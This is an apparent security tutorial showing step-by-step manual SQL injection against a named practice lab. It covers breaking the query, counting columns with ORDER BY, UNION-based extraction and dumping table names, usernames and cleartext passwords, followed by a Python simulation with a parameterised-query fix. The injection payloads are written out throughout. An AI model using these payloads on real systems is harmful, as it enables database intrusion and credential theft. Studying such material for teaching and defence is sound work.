SQL injection is a code injection technique used to read from or take control of a backend database (MySQL, MSSQL, Oracle, etc.) through input that an application pastes into its SQL statements. The OWASP Top 10 2017 release still ranks Injection as A1, the most critical web application risk.
The CWE/SANS Top 25 Most Dangerous Software Errors lists SQL injection as CWE-89, Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection'), at Rank 1.
The attack can be automated with a large number of tools available on the internet, but a human tester brings creative thinking and judgement about the target that tools lack, so I prefer to go through the injection manually.
NOTE: The payloads in this walkthrough are written for a MySQL backend. Against Oracle or other databases the same strings will not work as written, because comment syntax, string handling and the metadata tables (information_schema here) differ; the method still applies, but the payloads must be adapted.
SQL Injection ONLINE LAB:
- Beginners can use this website to practice SQL injection skills.
- The lab is reachable at http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1 (the original article linked it as "Click Here").
- (Screenshot of the lab's welcome page, not reproduced here.)
STEP 1: Breaking the Query
- Visit the website http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1
- Append a single quote to the existing URL to check whether the page is vulnerable to SQL injection: http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'
- If the page responds with the error "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1", the quote reached the database unescaped.
- That's great: the page is vulnerable to SQL injection.
- You have successfully broken the query, and the backend database is talking to the attacker through its error messages. (An application that suppresses errors can still be injectable; the quote test then needs a blind or boolean check instead, which is outside the scope of this walkthrough.)
STEP 2: Copying the Error Statement
- Copy and paste the SQL error statement into Notepad.
- Examine the quoted fragment in the error, as shown in the original screenshot: MySQL echoes the text near the point where parsing failed.
- The highlighted single quote is the character that breaks the backend query.
- Now put yourself in the developer's position and guess the SQL statement the application runs.
- The backend query most likely looks like this: SELECT username, password FROM table WHERE id='1'
- Adding a single quote leaves an unbalanced string literal, which is why the query fails: SELECT username, password FROM table WHERE id='1''
- Because the injected value sits inside a quoted string and the fault shows up as a visible error, this is called single-quote error-based string injection.
STEP 3: Joining the Query
- Add --+ after the quote to comment out the rest of the statement: http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1' --+
- The original screenshot shows the page loading without SQL errors once --+ is appended. In MySQL, -- starts a comment only when followed by whitespace; the + is decoded to a space by the web server, which is why --+ is used in a URL rather than a bare --.
- Everything placed before the comment marker now reaches the database as part of the query. At this point you have broken the query, joined it back together, and confirmed that the target is a single-quote error-based string injection.
STEP 4: Finding the Backend Columns
- Next, ask the database how many columns the query returns. ORDER BY n sorts by the n-th column of the result, so it fails as soon as n exceeds the column count: http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1' order by 1 --+
- The original screenshot shows no SQL error for order by 1, so the query returns at least one column.
- Repeat with order by 2, order by 3 and so on.
- order by 2 and order by 3 also return without errors, so the query has at least 3 columns.
- Try one more with order by 4.
- The screenshot shows the error "Unknown column '4' in 'order clause'", which tells us the query returns exactly 3 columns. This is how you hold a conversation with the database through its error messages.
STEP 5: Finding the Reflected Column
- Knowing the column count is not enough: you also need to know which of the 3 columns the page displays, because only that column can carry data back to you.
- Select all 3 columns with UNION ALL SELECT, using an id of -1 so the original row matches nothing and the UNION row is displayed instead: http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=-1' union all select 1,2,3 --+
- The original screenshot shows "Username is: 2", so the value of the 2nd selected column is what the page prints. That is the column we will use to extract data.
STEP 6: Finding the Database Name and Version
- Since we know the 2nd column is reflected, replace the 2 in the UNION payload with an expression such as database() and the page will print its result.
- The original screenshot shows the backend database name: leettime_761wHole
- Do the same with version() to read the server version.
- The screenshot shows the backend database version: 5.6.36-cll-lve
STEP 7: Dumping Database Tables
- group_concat() is an aggregate function that returns a single string with the concatenated non-NULL values from a group, which lets us read many rows through a single reflected column.
- So we can use this function to list all tables in the database in one request.
- The table list comes from information_schema, the read-only metadata schema that describes every object on the server: put group_concat(table_name) in the reflected column, select it from information_schema.tables, and restrict it with table_schema=database() to the current database.
- The original screenshot shows the dump of all tables: testtable1, user logs, users.
STEP 8: Dumping all Data in Columns of Tables
- Here I dump the column names of the users table, this time from information_schema.columns with group_concat(column_name), restricted to table_name='users'.
- The original screenshot shows the columns of the users table: id, username, password, user_type, sec_code
- Usernames and passwords are the most confidential of these, so let us dump them!
STEP 9: Dumping all Usernames
- Now we can dump every username in the database by selecting group_concat(username) from users in the reflected column.
- The original screenshot shows the dump of all usernames: injector, decompiler, devil hunter, Zen, Zenodermus, grayhat, khan, admin
- If we get the credentials for the admin account, that will be great!
STEP 10: Dumping all Passwords
- Now use the same group_concat call to read the password column from users.
- The original screenshot shows the dump of all passwords for those users: Khan, hacktract, dante, sec-idiots, security-i, hacker, haxor, sadmin
- The admin account's password is sadmin. Happy hacking! Note that the lab stores passwords in clear text, which is why they are readable straight out of the dump; in a real application the password column should hold salted hashes, and the root cause, unparameterised SQL, is what must be fixed.
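The complete procedure from Step 1 to Step 10, as an added worked example that is not part of the original article or the lab site. It simulates the vulnerable lookup (the id parameter spliced into the SQL text, as basic_ch1.php evidently does) against a constructed in-memory SQLite database so it runs offline, walks the same payloads through it, and contrasts the result with a parameterised query. The table layout, the sample rows and the "Username is: ..." display format are assumptions; where the SQLite dialect differs from the MySQL lab (sqlite_master and pragma_table_info instead of information_schema, sqlite_version() instead of version(), no database() equivalent) the MySQL form is given in a comment.

```python
# Added example, not code from the original article or the lab site.
# Replays the manual error/UNION injection steps against a constructed
# in-memory SQLite database; MySQL equivalents are noted in comments.
import sqlite3

# Constructed sample rows (the lab's real data is not reproduced here).
SEED_USERS = [
    (1, "injector", "Khan", "user", "s1"),
    (2, "admin", "sadmin", "admin", "s2"),
]


def make_db():
    """Build the throw-away database the simulated application queries."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT, "
                 "user_type TEXT, sec_code TEXT)")
    conn.execute("CREATE TABLE userlogs (id INTEGER, action TEXT)")
    conn.executemany("INSERT INTO users VALUES (?,?,?,?,?)", SEED_USERS)
    return conn


def vulnerable_lookup(conn, user_id):
    """Mimics basic_ch1.php: the id parameter is spliced into the SQL text.
    Returns (rows, error_text); exactly one of the two is None."""
    sql = f"SELECT id, username, password FROM users WHERE id='{user_id}'"
    try:
        return conn.execute(sql).fetchall(), None
    except sqlite3.Error as exc:
        return None, str(exc)  # verbose errors are what makes Step 1 work


def render(rows):
    """Assumed page behaviour: only the second column is displayed."""
    return f"Username is: {rows[0][1]}" if rows else "No user"


def safe_lookup(conn, user_id):
    """Hardened form: the value is bound as a parameter, never parsed as SQL."""
    return conn.execute("SELECT id, username, password FROM users WHERE id=?",
                        (user_id,)).fetchall()


def count_columns(conn, max_probe=20):
    """Step 4: ORDER BY n until the database complains; the last good n is
    the column count (MySQL: "Unknown column 'n' in 'order clause'")."""
    for n in range(1, max_probe + 1):
        _, err = vulnerable_lookup(conn, f"1' ORDER BY {n} --+")
        if err:
            return n - 1
    return None


def reflected_column(conn, ncols):
    """Step 5: UNION in marker values 1..n and read which one the page shows."""
    markers = ",".join(str(i + 1) for i in range(ncols))
    rows, _ = vulnerable_lookup(conn, f"-1' UNION ALL SELECT {markers} --+")
    shown = render(rows)                  # e.g. "Username is: 2"
    return int(shown.rsplit(" ", 1)[1])   # 1-based column number


def extract(conn, ncols, col, expression, from_clause=""):
    """Steps 6-10: place an expression in the reflected column and read it."""
    cells = ["1"] * ncols
    cells[col - 1] = expression
    payload = f"-1' UNION ALL SELECT {','.join(cells)} {from_clause} --+"
    rows, err = vulnerable_lookup(conn, payload)
    if err:
        raise RuntimeError(err)
    return rows[0][col - 1]


def walkthrough():
    conn = make_db()
    _, err = vulnerable_lookup(conn, "1'")          # Step 1: break the query
    ncols = count_columns(conn)                     # Step 4
    col = reflected_column(conn, ncols)             # Step 5
    return {
        "broken_query_error": err is not None,
        "joined_query": render(vulnerable_lookup(conn, "1' --+")[0]),  # Step 3
        "columns": ncols,
        "reflected": col,
        # MySQL: version()
        "version": extract(conn, ncols, col, "sqlite_version()"),
        # MySQL: group_concat(table_name) FROM information_schema.tables
        #        WHERE table_schema=database()
        "tables": extract(conn, ncols, col, "group_concat(name)",
                          "FROM sqlite_master WHERE type='table'"),
        # MySQL: group_concat(column_name) FROM information_schema.columns
        #        WHERE table_name='users'
        "user_columns": extract(conn, ncols, col, "group_concat(name)",
                                "FROM pragma_table_info('users')"),
        # MySQL: group_concat(username,0x3a,password) FROM users
        "credentials": extract(conn, ncols, col,
                               "group_concat(username || ':' || password)",
                               "FROM users"),
        # The same Step 3 payload against the parameterised query matches nothing
        "safe_rows": safe_lookup(conn, "1' --+"),
    }


if __name__ == "__main__":
    for key, value in walkthrough().items():
        print(f"{key}: {value}")
```

The two lookups differ only in how the value reaches the engine: in vulnerable_lookup the quote, the ORDER BY and the UNION are parsed as SQL, while in safe_lookup the entire string "1' --+" is compared against the id column as data and matches no row, so none of the later steps are possible against it.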
Source : GBHackers